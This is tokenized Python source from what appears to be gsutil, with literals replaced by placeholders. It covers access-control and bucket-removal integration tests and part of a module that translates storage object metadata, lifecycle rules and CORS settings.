"""<STR_LIT>""" <EOL> objects = [ ] <EOL> for i in range ( count ) : <EOL> objects . append ( self . CreateObject ( <EOL> bucket_uri = self . sample_uri , <EOL> contents = '<STR_LIT>' . format ( i ) ) ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , count ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_texts = [ ] <EOL> for obj in objects : <EOL> json_texts . append ( self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( obj ) ] , return_stdout = True ) ) <EOL> for json_text in json_texts : <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> uris = [ suri ( obj ) for obj in objects ] <EOL> self . RunGsUtil ( [ '<STR_LIT>' , '<STR_LIT>' ] + self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' ] + uris ) <EOL> json_texts = [ ] <EOL> for obj in objects : <EOL> json_texts . append ( self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( obj ) ] , return_stdout = True ) ) <EOL> for json_text in json_texts : <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> def testRecursiveChangeAcl ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , object_name = '<STR_LIT>' , <EOL> contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> @ Retry ( AssertionError , tries = <NUM_LIT:5> , timeout_secs = <NUM_LIT:1> ) <EOL> def _AddAcl ( ) : <EOL> self . RunGsUtil ( <EOL> self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) [ : - <NUM_LIT:3> ] ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> _AddAcl ( ) <EOL> @ Retry ( AssertionError , tries = <NUM_LIT:5> , timeout_secs = <NUM_LIT:1> ) <EOL> def _DeleteAcl ( ) : <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> _DeleteAcl ( ) <EOL> def testMultiVersionSupport ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket = self . CreateVersionedBucket ( ) <EOL> object_name = self . MakeTempName ( '<STR_LIT>' ) <EOL> self . CreateObject ( <EOL> bucket_uri = bucket , object_name = object_name , contents = '<STR_LIT>' ) <EOL> self . CreateObject ( <EOL> bucket_uri = bucket , object_name = object_name , contents = '<STR_LIT>' ) <EOL> lines = self . AssertNObjectsInBucket ( bucket , <NUM_LIT:2> , versioned = True ) <EOL> obj_v1 , obj_v2 = lines [ <NUM_LIT:0> ] , lines [ <NUM_LIT:1> ] <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v1 ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , obj_v1 ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v1 ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v2 ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> def testBadRequestAclChange ( self ) : <EOL> stdout , stderr = self . RunGsUtil ( <EOL> self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( self . sample_uri ) ] , <EOL> return_stdout = True , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertNotIn ( '<STR_LIT>' , stdout ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> def testAclGetWithoutFullControl ( self ) : <EOL> object_uri = self . CreateObject ( contents = '<STR_LIT:foo>' ) <EOL> with self . SetAnonymousBotoCreds ( ) : <EOL> stderr = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( object_uri ) ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def testTooFewArgumentsFails ( self ) : <EOL> """<STR_LIT>""" <EOL> stderr = self . RunGsUtil ( self . _get_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( self . _ch_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT>' ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def testMinusF ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri = suri ( self . CreateObject ( bucket_uri = bucket_uri , object_name = '<STR_LIT:foo>' , <EOL> contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( bucket_uri ) + '<STR_LIT>' , obj_uri ] , <EOL> expected_status = <NUM_LIT:1> ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> class TestS3CompatibleAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def testAclObjectGetSet ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri = self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT:foo>' ) <EOL> self . AssertNObjectsInBucket ( bucket_uri , <NUM_LIT:1> ) <EOL> stdout = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj_uri ) ] , <EOL> return_stdout = True ) <EOL> set_contents = self . CreateTempFile ( contents = stdout ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ set_contents , suri ( obj_uri ) ] ) <EOL> def testAclBucketGetSet ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> stdout = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( bucket_uri ) ] , <EOL> return_stdout = True ) <EOL> set_contents = self . CreateTempFile ( contents = stdout ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ set_contents , suri ( bucket_uri ) ] ) <EOL> @ SkipForGS ( '<STR_LIT>' ) <EOL> class TestS3OnlyAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def test_set_xml_acl ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> class TestAclOldAlias ( TestAcl ) : <EOL> _set_acl_prefix = [ '<STR_LIT>' ] <EOL> _get_acl_prefix = [ '<STR_LIT>' ] <EOL> _set_defacl_prefix = [ '<STR_LIT>' ] <EOL> _ch_acl_prefix = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import gslib . tests . testcase as testcase <EOL> from gslib . tests . util import ObjectToURI as suri <EOL> class TestRb ( testcase . GsUtilIntegrationTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_rb_bucket_works ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] ) <EOL> stderr = self . RunGsUtil ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % self . nonexistent_bucket_name ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_bucket_not_empty ( self ) : <EOL> bucket_uri = self . CreateBucket ( test_objects = <NUM_LIT:1> ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] , expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_versioned_bucket_not_empty ( self ) : <EOL> bucket_uri = self . CreateVersionedBucket ( test_objects = <NUM_LIT:1> ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] , expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , <EOL> stderr ) <EOL> def test_rb_nonexistent_bucket ( self ) : <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , '<STR_LIT>' % self . nonexistent_bucket_name ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_minus_f ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> stderr = self . RunGsUtil ( [ <EOL> '<STR_LIT:rb>' , '<STR_LIT>' , '<STR_LIT>' % self . nonexistent_bucket_name , <EOL> suri ( bucket_uri ) ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( bucket_uri ) ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import json <EOL> import re <EOL> import textwrap <EOL> import xml . etree . ElementTree <EOL> from apitools . base . py import encoding <EOL> import boto <EOL> from boto . gs . acl import ACL <EOL> from boto . gs . acl import ALL_AUTHENTICATED_USERS <EOL> from boto . gs . acl import ALL_USERS <EOL> from boto . gs . acl import Entries <EOL> from boto . gs . acl import Entry <EOL> from boto . gs . acl import GROUP_BY_DOMAIN <EOL> from boto . gs . acl import GROUP_BY_EMAIL <EOL> from boto . gs . acl import GROUP_BY_ID <EOL> from boto . gs . acl import USER_BY_EMAIL <EOL> from boto . gs . acl import USER_BY_ID <EOL> from gslib . cloud_api import ArgumentException <EOL> from gslib . cloud_api import BucketNotFoundException <EOL> from gslib . cloud_api import NotFoundException <EOL> from gslib . cloud_api import Preconditions <EOL> from gslib . exception import CommandException <EOL> from gslib . third_party . storage_apitools import storage_v1_messages as apitools_messages <EOL> try : <EOL> from xml . etree . ElementTree import ParseError as XmlParseError <EOL> except ImportError : <EOL> from xml . parsers . expat import ExpatError as XmlParseError <EOL> CACHE_CONTROL_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_DISPOSITION_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_ENCODING_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_LANGUAGE_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_MD5_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_TYPE_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_API_VERSION_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_GENERATION_MATCH_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_METAGENERATION_MATCH_REGEX = re . compile ( <EOL> r'<STR_LIT>' , re . I ) <EOL> CUSTOM_GOOG_METADATA_REGEX = re . compile ( r'<STR_LIT>' , <EOL> re . I ) <EOL> CUSTOM_AMZ_METADATA_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CUSTOM_AMZ_HEADER_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> S3_ACL_MARKER_GUID = '<STR_LIT>' <EOL> S3_DELETE_MARKER_GUID = '<STR_LIT>' <EOL> S3_MARKER_GUIDS = [ S3_ACL_MARKER_GUID , S3_DELETE_MARKER_GUID ] <EOL> S3_HEADER_PREFIX = '<STR_LIT>' <EOL> DEFAULT_CONTENT_TYPE = '<STR_LIT>' <EOL> REMOVE_CORS_CONFIG = [ apitools_messages . Bucket . CorsValueListEntry ( <EOL> maxAgeSeconds = - <NUM_LIT:1> , method = [ '<STR_LIT>' ] ) ] <EOL> PRIVATE_DEFAULT_OBJ_ACL = apitools_messages . ObjectAccessControl ( <EOL> id = '<STR_LIT>' ) <EOL> def ObjectMetadataFromHeaders ( headers ) : <EOL> """<STR_LIT>""" <EOL> obj_metadata = apitools_messages . Object ( ) <EOL> for header , value in headers . items ( ) : <EOL> if CACHE_CONTROL_REGEX . match ( header ) : <EOL> obj_metadata . cacheControl = value . strip ( ) <EOL> elif CONTENT_DISPOSITION_REGEX . match ( header ) : <EOL> obj_metadata . contentDisposition = value . strip ( ) <EOL> elif CONTENT_ENCODING_REGEX . match ( header ) : <EOL> obj_metadata . contentEncoding = value . strip ( ) <EOL> elif CONTENT_MD5_REGEX . match ( header ) : <EOL> obj_metadata . md5Hash = value . strip ( ) <EOL> elif CONTENT_LANGUAGE_REGEX . match ( header ) : <EOL> obj_metadata . contentLanguage = value . strip ( ) <EOL> elif CONTENT_TYPE_REGEX . match ( header ) : <EOL> if not value : <EOL> obj_metadata . contentType = DEFAULT_CONTENT_TYPE <EOL> else : <EOL> obj_metadata . contentType = value . strip ( ) <EOL> elif GOOG_API_VERSION_REGEX . match ( header ) : <EOL> continue <EOL> elif GOOG_GENERATION_MATCH_REGEX . match ( header ) : <EOL> continue <EOL> elif GOOG_METAGENERATION_MATCH_REGEX . match ( header ) : <EOL> continue <EOL> else : <EOL> custom_goog_metadata_match = CUSTOM_GOOG_METADATA_REGEX . match ( header ) <EOL> custom_amz_metadata_match = CUSTOM_AMZ_METADATA_REGEX . match ( header ) <EOL> custom_amz_header_match = CUSTOM_AMZ_HEADER_REGEX . match ( header ) <EOL> header_key = None <EOL> if custom_goog_metadata_match : <EOL> header_key = custom_goog_metadata_match . group ( '<STR_LIT>' ) <EOL> elif custom_amz_metadata_match : <EOL> header_key = custom_amz_metadata_match . group ( '<STR_LIT>' ) <EOL> elif custom_amz_header_match : <EOL> header_key = ( S3_HEADER_PREFIX + <EOL> custom_amz_header_match . group ( '<STR_LIT>' ) ) <EOL> if header_key : <EOL> if header_key . lower ( ) == '<STR_LIT>' : <EOL> continue <EOL> if not obj_metadata . metadata : <EOL> obj_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not obj_metadata . metadata . additionalProperties : <EOL> obj_metadata . metadata . additionalProperties = [ ] <EOL> obj_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( <EOL> key = header_key , value = value ) ) <EOL> else : <EOL> raise ArgumentException ( <EOL> '<STR_LIT>' % ( header , value ) ) <EOL> return obj_metadata <EOL> def HeadersFromObjectMetadata ( dst_obj_metadata , provider ) : <EOL> """<STR_LIT>""" <EOL> headers = { } <EOL> if not dst_obj_metadata : <EOL> return <EOL> if dst_obj_metadata . cacheControl is not None : <EOL> if not dst_obj_metadata . cacheControl : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . cacheControl . strip ( ) <EOL> if dst_obj_metadata . contentDisposition : <EOL> if not dst_obj_metadata . contentDisposition : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = ( <EOL> dst_obj_metadata . contentDisposition . strip ( ) ) <EOL> if dst_obj_metadata . contentEncoding : <EOL> if not dst_obj_metadata . contentEncoding : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentEncoding . strip ( ) <EOL> if dst_obj_metadata . contentLanguage : <EOL> if not dst_obj_metadata . contentLanguage : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentLanguage . strip ( ) <EOL> if dst_obj_metadata . md5Hash : <EOL> if not dst_obj_metadata . md5Hash : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . md5Hash . strip ( ) <EOL> if dst_obj_metadata . contentType is not None : <EOL> if not dst_obj_metadata . contentType : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentType . strip ( ) <EOL> if ( dst_obj_metadata . metadata and <EOL> dst_obj_metadata . metadata . additionalProperties ) : <EOL> for additional_property in dst_obj_metadata . metadata . additionalProperties : <EOL> if additional_property . key == '<STR_LIT>' : <EOL> continue <EOL> if additional_property . key in S3_MARKER_GUIDS : <EOL> continue <EOL> if provider == '<STR_LIT>' : <EOL> header_name = '<STR_LIT>' + additional_property . key <EOL> elif provider == '<STR_LIT>' : <EOL> if additional_property . key . startswith ( S3_HEADER_PREFIX ) : <EOL> header_name = ( '<STR_LIT>' + <EOL> additional_property . key [ len ( S3_HEADER_PREFIX ) : ] ) <EOL> else : <EOL> header_name = '<STR_LIT>' + additional_property . key <EOL> else : <EOL> raise ArgumentException ( '<STR_LIT>' % provider ) <EOL> if ( additional_property . value is not None and <EOL> not additional_property . value ) : <EOL> headers [ header_name ] = None <EOL> else : <EOL> headers [ header_name ] = additional_property . value <EOL> return headers <EOL> def CopyObjectMetadata ( src_obj_metadata , dst_obj_metadata , override = False ) : <EOL> """<STR_LIT>""" <EOL> if override or not dst_obj_metadata . cacheControl : <EOL> dst_obj_metadata . cacheControl = src_obj_metadata . cacheControl <EOL> if override or not dst_obj_metadata . contentDisposition : <EOL> dst_obj_metadata . contentDisposition = src_obj_metadata . contentDisposition <EOL> if override or not dst_obj_metadata . contentEncoding : <EOL> dst_obj_metadata . contentEncoding = src_obj_metadata . contentEncoding <EOL> if override or not dst_obj_metadata . contentLanguage : <EOL> dst_obj_metadata . contentLanguage = src_obj_metadata . contentLanguage <EOL> if override or not dst_obj_metadata . contentType : <EOL> dst_obj_metadata . contentType = src_obj_metadata . contentType <EOL> if override or not dst_obj_metadata . md5Hash : <EOL> dst_obj_metadata . md5Hash = src_obj_metadata . md5Hash <EOL> if ( src_obj_metadata . metadata and <EOL> src_obj_metadata . metadata . additionalProperties ) : <EOL> if not dst_obj_metadata . metadata : <EOL> dst_obj_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not dst_obj_metadata . metadata . additionalProperties : <EOL> dst_obj_metadata . metadata . additionalProperties = [ ] <EOL> dst_metadata_dict = { } <EOL> for dst_prop in dst_obj_metadata . metadata . additionalProperties : <EOL> dst_metadata_dict [ dst_prop . key ] = dst_prop . value <EOL> for src_prop in src_obj_metadata . metadata . additionalProperties : <EOL> if src_prop . key in dst_metadata_dict : <EOL> if override : <EOL> if src_prop . value is not None and not src_prop . value : <EOL> dst_metadata_dict [ src_prop . key ] = None <EOL> else : <EOL> dst_metadata_dict [ src_prop . key ] = src_prop . value <EOL> else : <EOL> dst_metadata_dict [ src_prop . key ] = src_prop . value <EOL> dst_obj_metadata . metadata . additionalProperties = [ ] <EOL> for k , v in dst_metadata_dict . iteritems ( ) : <EOL> dst_obj_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( key = k , <EOL> value = v ) ) <EOL> def PreconditionsFromHeaders ( headers ) : <EOL> """<STR_LIT>""" <EOL> return_preconditions = Preconditions ( ) <EOL> try : <EOL> for header , value in headers . items ( ) : <EOL> if GOOG_GENERATION_MATCH_REGEX . match ( header ) : <EOL> return_preconditions . gen_match = long ( value ) <EOL> if GOOG_METAGENERATION_MATCH_REGEX . match ( header ) : <EOL> return_preconditions . meta_gen_match = long ( value ) <EOL> except ValueError , _ : <EOL> raise ArgumentException ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return return_preconditions <EOL> def CreateNotFoundExceptionForObjectWrite ( <EOL> dst_provider , dst_bucket_name , src_provider = None , <EOL> src_bucket_name = None , src_object_name = None , src_generation = None ) : <EOL> """<STR_LIT>""" <EOL> dst_url_string = '<STR_LIT>' % ( dst_provider , dst_bucket_name ) <EOL> if src_bucket_name and src_object_name : <EOL> src_url_string = '<STR_LIT>' % ( src_provider , src_bucket_name , <EOL> src_object_name ) <EOL> if src_generation : <EOL> src_url_string += '<STR_LIT>' % str ( src_generation ) <EOL> return NotFoundException ( <EOL> '<STR_LIT>' % <EOL> ( src_url_string , dst_url_string ) ) <EOL> return NotFoundException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % dst_url_string ) <EOL> def CreateBucketNotFoundException ( code , provider , bucket_name ) : <EOL> return BucketNotFoundException ( '<STR_LIT>' % <EOL> ( provider , bucket_name ) , bucket_name , <EOL> status = code ) <EOL> def CreateObjectNotFoundException ( code , provider , bucket_name , object_name , <EOL> generation = None ) : <EOL> uri_string = '<STR_LIT>' % ( provider , bucket_name , object_name ) <EOL> if generation : <EOL> uri_string += '<STR_LIT>' % str ( generation ) <EOL> return NotFoundException ( '<STR_LIT>' % uri_string , status = code ) <EOL> def EncodeStringAsLong ( string_to_convert ) : <EOL> """<STR_LIT>""" <EOL> return long ( string_to_convert . encode ( '<STR_LIT>' ) , <NUM_LIT:16> ) <EOL> def _DecodeLongAsString ( long_to_convert ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( long_to_convert , basestring ) : <EOL> return long_to_convert <EOL> return hex ( long_to_convert ) [ <NUM_LIT:2> : - <NUM_LIT:1> ] . decode ( '<STR_LIT>' ) <EOL> def GenerationFromUrlAndString ( url , generation ) : <EOL> """<STR_LIT>""" <EOL> if url . scheme == '<STR_LIT>' and generation : <EOL> return _DecodeLongAsString ( generation ) <EOL> return generation <EOL> def CheckForXmlConfigurationAndRaise ( config_type_string , json_txt ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> xml . etree . ElementTree . fromstring ( str ( json_txt ) ) <EOL> raise ArgumentException ( '<STR_LIT:\n>' . join ( textwrap . wrap ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( config_type_string , <EOL> config_type_string . lower ( ) ) ) ) ) <EOL> except XmlParseError : <EOL> pass <EOL> raise ArgumentException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( config_type_string , json_txt ) ) <EOL> class LifecycleTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def BotoLifecycleFromMessage ( cls , lifecycle_message ) : <EOL> """<STR_LIT>""" <EOL> boto_lifecycle = boto . gs . lifecycle . LifecycleConfig ( ) <EOL> if lifecycle_message : <EOL> for rule_message in lifecycle_message . rule : <EOL> boto_rule = boto . gs . lifecycle . Rule ( ) <EOL> if ( rule_message . action and rule_message . action . type and <EOL> rule_message . action . type . lower ( ) == '<STR_LIT>' ) : <EOL> boto_rule . action = boto . gs . lifecycle . DELETE <EOL> if rule_message . condition : <EOL> if rule_message . condition . age : <EOL> boto_rule . conditions [ boto . gs . lifecycle . AGE ] = ( <EOL> str ( rule_message . condition . age ) ) <EOL> if rule_message . condition . createdBefore : <EOL> boto_rule . conditions [ boto . gs . lifecycle . CREATED_BEFORE ] = ( <EOL> str ( rule_message . condition . createdBefore ) ) <EOL> if rule_message . condition . isLive : <EOL> boto_rule . conditions [ boto . gs . lifecycle . IS_LIVE ] = ( <EOL> str ( rule_message . condition . isLive ) ) <EOL> if rule_message . condition . numNewerVersions : <EOL> boto_rule . conditions [ boto . gs . lifecycle . NUM_NEWER_VERSIONS ] = ( <EOL> str ( rule_message . condition . numNewerVersions ) ) <EOL> boto_lifecycle . append ( boto_rule ) <EOL> return boto_lifecycle <EOL> @ classmethod <EOL> def BotoLifecycleToMessage ( cls , boto_lifecycle ) : <EOL> """<STR_LIT>""" <EOL> lifecycle_message = None <EOL> if boto_lifecycle : <EOL> lifecycle_message = apitools_messages . Bucket . LifecycleValue ( ) <EOL> for boto_rule in boto_lifecycle : <EOL> lifecycle_rule = ( <EOL> apitools_messages . Bucket . LifecycleValue . RuleValueListEntry ( ) ) <EOL> lifecycle_rule . condition = ( apitools_messages . Bucket . LifecycleValue . <EOL> RuleValueListEntry . ConditionValue ( ) ) <EOL> if boto_rule . action and boto_rule . action == boto . gs . lifecycle . DELETE : <EOL> lifecycle_rule . action = ( apitools_messages . Bucket . LifecycleValue . <EOL> RuleValueListEntry . ActionValue ( <EOL> type = '<STR_LIT>' ) ) <EOL> if boto . gs . lifecycle . AGE in boto_rule . conditions : <EOL> lifecycle_rule . condition . age = int ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . AGE ] ) <EOL> if boto . gs . lifecycle . CREATED_BEFORE in boto_rule . conditions : <EOL> lifecycle_rule . condition . createdBefore = ( <EOL> LifecycleTranslation . TranslateBotoLifecycleTimestamp ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . CREATED_BEFORE ] ) ) <EOL> if boto . gs . lifecycle . IS_LIVE in boto_rule . conditions : <EOL> lifecycle_rule . condition . isLive = bool ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . IS_LIVE ] ) <EOL> if boto . gs . lifecycle . NUM_NEWER_VERSIONS in boto_rule . conditions : <EOL> lifecycle_rule . condition . numNewerVersions = int ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . NUM_NEWER_VERSIONS ] ) <EOL> lifecycle_message . rule . append ( lifecycle_rule ) <EOL> return lifecycle_message <EOL> @ classmethod <EOL> def JsonLifecycleFromMessage ( cls , lifecycle_message ) : <EOL> """<STR_LIT>""" <EOL> return str ( encoding . MessageToJson ( lifecycle_message ) ) + '<STR_LIT:\n>' <EOL> @ classmethod <EOL> def JsonLifecycleToMessage ( cls , json_txt ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_lifecycle = json . loads ( json_txt ) <EOL> if '<STR_LIT>' in deserialized_lifecycle : <EOL> deserialized_lifecycle = deserialized_lifecycle [ '<STR_LIT>' ] <EOL> lifecycle = encoding . DictToMessage ( <EOL> deserialized_lifecycle , apitools_messages . Bucket . LifecycleValue ) <EOL> return lifecycle <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_txt ) <EOL> @ classmethod <EOL> def TranslateBotoLifecycleTimestamp ( cls , lifecycle_datetime ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( lifecycle_datetime , '<STR_LIT>' ) . date ( ) <EOL> class CorsTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def BotoCorsFromMessage ( cls , cors_message ) : <EOL> """<STR_LIT>""" <EOL> cors = boto . gs . cors . Cors ( ) <EOL> cors . cors = [ ] <EOL> for collection_message in cors_message : <EOL> collection_elements = [ ] <EOL> if collection_message . maxAgeSeconds : <EOL> collection_elements . append ( ( boto . gs . cors . MAXAGESEC , <EOL> str ( collection_message . maxAgeSeconds ) ) ) <EOL> if collection_message . method : <EOL> method_elements = [ ] <EOL> for method in collection_message . method : <EOL> method_elements . append ( ( boto . gs . cors . METHOD , method ) ) <EOL> collection_elements . append ( ( boto . gs . cors . METHODS , method_elements ) ) <EOL> if collection_message . origin : <EOL> origin_elements = [ ] <EOL> for origin in collection_message . origin : <EOL> origin_elements . append ( ( boto . gs . cors . ORIGIN , origin ) ) <EOL> collection_elements . append ( ( boto . gs . cors . ORIGINS , origin_elements ) ) <EOL> if collection_message . responseHeader : <EOL> header_elements = [ ] <EOL> for header in collection_message . responseHeader : <EOL> header_elements . append ( ( boto . 